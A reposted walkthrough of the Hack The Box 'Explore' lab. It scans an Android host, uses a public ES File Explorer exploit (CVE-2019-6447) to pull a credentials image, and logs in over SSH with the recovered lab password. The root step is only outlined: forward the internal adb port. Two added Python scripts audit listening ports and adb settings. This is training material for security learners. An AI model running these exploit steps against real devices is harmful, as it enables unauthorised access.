HTB-Explore(Easy)

admin · 2024-02-09 01:28:59 · 8 views · 9750 characters · 32 min 30 s read

Topics covered: Android pentesting, ES File Explorer exploitation, inferring and handling anomalous states during a pentest, adb analysis, SSH local port forwarding, privilege escalation via adb



Scan

Port 2222 shows up; a Google search for the banner "Banana Studio" suggests it belongs to a Google Play app that provides an SSH service.

Port 5555 is in the filtered state, meaning external connections are blocked; this is worth keeping in mind once we are inside.

Port 42135 reveals ES File Explorer, which Google tells us is a file manager.

Finally, the OS detection points most likely to Android, so that is the assumption to work with.

┌──(kali㉿kali)-[~/Desktop/htb]
└─$ sudo nmap --min-rate 10000 -p- 10.129.206.179
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-09 03:28 EST
Nmap scan report for 10.129.206.179
Host is up (0.43s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
36925/tcp open     unknown
42135/tcp open     unknown
59777/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds

┌──(kali㉿kali)-[~/Desktop/htb]
└─$ sudo nmap -sC -sT -sV -O -p2222,5555,36925,59777 10.129.206.179
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-09 03:29 EST
Nmap scan report for 10.129.206.179
Host is up (0.42s latency).

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
5555/tcp  filtered freeciv
36925/tcp open     unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Tue, 09 Jan 2024 08:29:28 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Tue, 09 Jan 2024 08:29:33 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:52 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   Kerberos: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:58 GMT
|     Content-Length: 41
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     qj?n0?k?
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:33 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:53 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:55 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 Jan 2024 08:29:55 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Android 4.1 - 6.0 (Linux 3.4 - 3.14) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.0 - 7.0 (Linux 3.4 - 3.10) (93%), Android 4.2.2 (Linux 3.4) (92%), Sony X75CH-series Android TV (Android 5.0) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Device: phone
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.94%I=7%D=1/9%Time=659D03FB%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2.0-SSHx20Serverx20-x20Bananax20Studiorn");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port36925-TCP:V=7.94%I=7%D=1/9%Time=659D0401%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,5C,"HTTP/1.1x20412x20Preconditionx20FailedrnDate:x20Tue
SF:,x2009x20Janx202024x2008:29:28x20GMTrnContent-Length:x200rnr
SF:n")%r(HTTPOptions,B5,"HTTP/1.0x20501x20Notx20ImplementedrnDate:
SF:x20Tue,x2009x20Janx202024x2008:29:33x20GMTrnContent-Length:x202
SF:9rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConnection:x2
SF:0ClosernrnMethodx20notx20supported:x20OPTIONS")%r(RTSPRequest,BB
SF:,"HTTP/1.0x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202
SF:024x2008:29:33x20GMTrnContent-Length:x2039rnContent-Type:x20tex
SF:t/plain;x20charset=US-ASCIIrnConnection:x20ClosernrnNotx20ax2
SF:0validx20protocolx20version:x20x20RTSP/1.0")%r(Help,AE,"HTTP/1.0
SF:x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202024x2008:29
SF::52x20GMTrnContent-Length:x2026rnContent-Type:x20text/plain;x20
SF:charset=US-ASCIIrnConnection:x20ClosernrnInvalidx20requestx20l
SF:ine:x20HELP")%r(SSLSessionReq,DD,"HTTP/1.0x20400x20Badx20Requestr
SF:nDate:x20Tue,x2009x20Janx202024x2008:29:53x20GMTrnContent-Leng
SF:th:x2073rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConnec
SF:tion:x20ClosernrnInvalidx20requestx20line:x20x16x03Sx01
SF:0Ox03?G???,???`~???{????w????<=?o?x10n
SF:(x16x13")%r(TerminalServerCookie,CA,"HTTP/1.0x20400x20Badx2
SF:0RequestrnDate:x20Tue,x2009x20Janx202024x2008:29:55x20GMTrnCo
SF:ntent-Length:x2054rnContent-Type:x20text/plain;x20charset=US-ASCII
SF:rnConnection:x20ClosernrnInvalidx20requestx20line:x20x03
SF:*%?Cookie:x20mstshash=nmap")%r(TLSSessionReq,DB,"HTTP/1.0
SF:x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202024x2008:2
SF:9:55x20GMTrnContent-Length:x2071rnContent-Type:x20text/plain;x2
SF:0charset=US-ASCIIrnConnection:x20ClosernrnInvalidx20requestx20
SF:line:x20x16x03ix01ex03x03Ux1c??random1random2random3ra
SF:ndom4x0c/")%r(Kerberos,BD,"HTTP/1.0x20400x20Badx20Request
SF:rnDate:x20Tue,x2009x20Janx202024x2008:29:58x20GMTrnContent-Len
SF:gth:x2041rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConne
SF:ction:x20ClosernrnInvalidx20requestx20line:x20qj?n0?k?
SF:x03x02x01x05?x03x02x01");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Android 4.1 - 6.0 (Linux 3.4 - 3.14) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.0 - 7.0 (Linux 3.4 - 3.10) (93%), Adtran 424RG FTTH gateway (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.29 seconds




ES File Explorer

After analysing the scan results, the routine next step is to look for public exploits.

┌──(kali㉿kali)-[~/Desktop/htb]
└─$ searchsploit es file explore
-------------------------------------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                                                          |  Path
-------------------------------------------------------------------------------------------------------- ---------------------------
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities                                            | php/webapps/51615.txt
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                                        | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                            | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                               | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)                 | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)                     | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)                     | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)                           | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                            | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution     | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access         | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write| windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                         | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                          | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                       | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                       | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                               | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                     | php/webapps/35851.txt
-------------------------------------------------------------------------------------------------------- ---------------------------
Shellcodes: No Results

One entry is exploit code for the Android platform (android/remote/50070.py), so it is worth a try.

It corresponds to a CVE; let's look at how the script is used.

Listing the pictures:

┌──(kali㉿kali)-[~/Desktop/htb/Explore]
└─$ python3 50070.py listPics 10.129.206.179

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

┌──(kali㉿kali)-[~/Desktop/htb/Explore]
└─$ python3 50070.py getFile 10.129.206.179 /storage/emulated/0/DCIM/creds.jpg
# this retrieves the creds image


kristi
Kr1sT!5h@Rp3xPl0r3!

That gives us a set of credentials. Trying them over SSH works, and basic enumeration yields the user flag. Looking at the socket state, port 5555 is listening internally:

:/ $ ss -tln
State       Recv-Q Send-Q Local Address:Port               Peer Address:Port
LISTEN      0      50     [::ffff:10.129.206.179]:41083    *:*
LISTEN      0      50           *:59777                    *:*
LISTEN      0      50           *:2222                     *:*
LISTEN      0      8       [::ffff:127.0.0.1]:35665        *:*
LISTEN      0      4            *:5555                     *:*
LISTEN      0      10           *:42135                    *:*
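The inference drawn in the Scan section and confirmed here (a port that nmap reports as filtered from the outside but that ss shows bound to every interface on the box) can be mechanised. The following Python is an added example, not code from the original writeup: it parses the nmap port table and the ss -tln listing and labels each listener as exposed, loopback-only, reachable internally only, or unseen by the external scan. The two embedded excerpts are constructed from the values shown on this page.

```python
import re

# Constructed excerpt of the external nmap port table reproduced above.
NMAP_OUTPUT = """\
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
36925/tcp open     unknown
42135/tcp open     unknown
59777/tcp open     unknown
"""

# Constructed excerpt of `ss -tln` as run on the device itself.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port            Peer Address:Port
LISTEN 0      50     [::ffff:10.129.206.179]:41083 *:*
LISTEN 0      50     *:59777                       *:*
LISTEN 0      50     *:2222                        *:*
LISTEN 0      8      [::ffff:127.0.0.1]:35665      *:*
LISTEN 0      4      *:5555                        *:*
LISTEN 0      10     *:42135                       *:*
"""

NMAP_LINE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)", re.M)


def parse_nmap(text):
    """Return {port: state} from an nmap port table."""
    return {int(port): state for port, state, _service in NMAP_LINE.findall(text)}


def parse_ss(text):
    """Return {port: local_address} for every LISTEN socket in `ss -tln` output."""
    listeners = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # skip the header and anything that is not a listener
        addr, port = fields[3].rsplit(":", 1)  # '[::ffff:127.0.0.1]:35665' -> addr, port
        listeners[int(port)] = addr
    return listeners


def is_loopback(addr):
    """True for 127.0.0.1, ::1 and the IPv4-mapped form ss prints on Android."""
    addr = addr.strip("[]")
    return addr in ("127.0.0.1", "::1") or addr.endswith(":127.0.0.1")


def classify(nmap_states, listeners):
    """Cross-reference internal listeners with the external scan result."""
    result = {}
    for port, addr in sorted(listeners.items()):
        if is_loopback(addr):
            result[port] = "loopback-only"
        elif nmap_states.get(port) == "open":
            result[port] = "exposed"
        elif nmap_states.get(port) == "filtered":
            # Bound on the host, blocked by a firewall in between: only reachable from inside.
            result[port] = "internal-only (filtered externally)"
        else:
            result[port] = "not seen by external scan"
    return result


if __name__ == "__main__":
    for port, label in classify(parse_nmap(NMAP_OUTPUT), parse_ss(SS_OUTPUT)).items():
        print(f"{port:>6}  {label}")
```

Run against the two excerpts, 5555 comes out as the only internal-only service, 35665 as loopback-only, and 41083 (a socket bound to the device's own address that the full port scan never reported) as unseen; the last category is the one to revisit, since a listener that an external scan misses is exactly what a host-level review exists to catch.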

A quick Google search shows that port 5555 is normally used for adb debugging, so the next step is a tunnel: an SSH port forward to reach it (adb is a debugging tool to begin with and usually runs with elevated privileges, which is the line of thinking worth trying here).
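From a hardening standpoint, whether adbd accepts TCP connections and whether it runs as root are both decided by system properties that getprop reports. The Python below is an added example (not from the writeup, HTB or the Android project) that audits a getprop listing for those settings. The embedded listing is constructed; the property names are the stock Android ones (ro.secure, ro.debuggable, ro.adb.secure, service.adb.tcp.port, persist.adb.tcp.port).

```python
import re

# Constructed `getprop` excerpt: a debug-style build with adb listening on TCP,
# the kind of configuration a port 5555 listener implies. Not captured from the HTB box.
GETPROP_OUTPUT = """\
[ro.build.type]: [userdebug]
[ro.debuggable]: [1]
[ro.secure]: [0]
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[persist.adb.tcp.port]: []
"""

# getprop prints one "[name]: [value]" pair per line; the value may be empty.
PROP_LINE = re.compile(r"^\[([^\]]+)\]: \[([^\]]*)\]$", re.M)


def parse_getprop(text):
    """Return {property: value} from getprop output."""
    return dict(PROP_LINE.findall(text))


def audit_adb(props):
    """Return a list of findings describing how exposed adbd is on this build."""
    findings = []
    # Either property enables adb over TCP; "-1" (what `adb usb` sets) means disabled.
    tcp_port = props.get("service.adb.tcp.port") or props.get("persist.adb.tcp.port")
    if tcp_port and tcp_port != "-1":
        findings.append(f"adb listens on TCP port {tcp_port}: reachable by any host that can route to the device")
    if props.get("ro.secure") == "0":
        findings.append("ro.secure=0: adbd runs as root by default")
    elif props.get("ro.debuggable") == "1":
        findings.append("ro.debuggable=1: adbd can be restarted as root with `adb root`")
    if props.get("ro.adb.secure") != "1":
        findings.append("ro.adb.secure!=1: clients are not required to be RSA-authorized before connecting")
    return findings


if __name__ == "__main__":
    for finding in audit_adb(parse_getprop(GETPROP_OUTPUT)):
        print("-", finding)
```

On the constructed listing this reports three findings; a production build should show ro.secure=1, ro.debuggable=0, ro.adb.secure=1 and service.adb.tcp.port unset or -1, for which the audit returns nothing. The firewall that made 5555 appear filtered in the Scan section is a useful second layer, but it does not change what adbd itself would grant to a client that reaches it.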


ROOT

Straight through from there: Android is Unix-like underneath, so the approach is much the same as on an ordinary Linux host.


Originally published on the WeChat official account 搁浅安全: HTB-Explore(Easy)

Posted by admin on 2024-02-09 01:28:59. When reposting, keep the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2415083.html
